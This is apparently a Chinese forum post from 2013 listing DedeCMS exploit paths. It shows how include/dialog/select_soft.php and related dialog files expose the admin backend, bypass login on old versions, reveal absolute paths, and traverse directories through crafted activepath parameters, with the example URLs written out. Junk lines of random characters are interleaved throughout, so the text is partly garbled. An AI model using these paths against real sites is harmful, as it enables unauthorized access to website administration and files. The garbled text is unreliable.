1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
' ^3 u# B( t8 P5 }( Z. N; z; r
5 i+ J4 M* j2 P: J" `' e3 }员帐号,新版本的就直接转向了后台.% U, b& }9 d( t3 `
: X9 F: C2 r, w& u/ y2.include/dialog/config.php会爆出后台管理路径, X+ G& P! _- c6 R/ l2 M
# M7 W. ` c4 Y, Z8 y/ T9 z3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录4 B3 W6 D2 ^% x* | A# _
. Q" G" c/ a6 q; p2 F4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.: S5 M: e6 N' p8 w9 E
/ d+ j/ S7 a% y5 ^' o5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉8 {: b1 O' K Q3 ~1 M
& W: T4 M: Z& c$ R, l/ }到根目录去.不过这些版本的访问地址有些不同.
5 m3 ~! p, X( n1 q. [: W地址为require/dialog/select_soft.php?activepath=/././././././././. S$ _: |& ?" N9 p1 A- i
5 N6 S+ k+ {/ i/ ` winclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
; y5 L/ E4 L+ H( n/ \7 x+ Q5 B; M Q存在相同问题的文件还有
* ^ s& f& m# s. s! U/ Ninclude\dialog\select_images.php# ?* R: X9 C) C) o3 @3 A/ x/ l/ ~( G
include\dialog\select_media.php* _0 j6 D7 t" G+ N
include\dialog\select_templets.php
# ^9 i1 b( i9 m/ t" s7 E |
发表于 2013-4-16 16:50:43
收藏
分享
支持
反对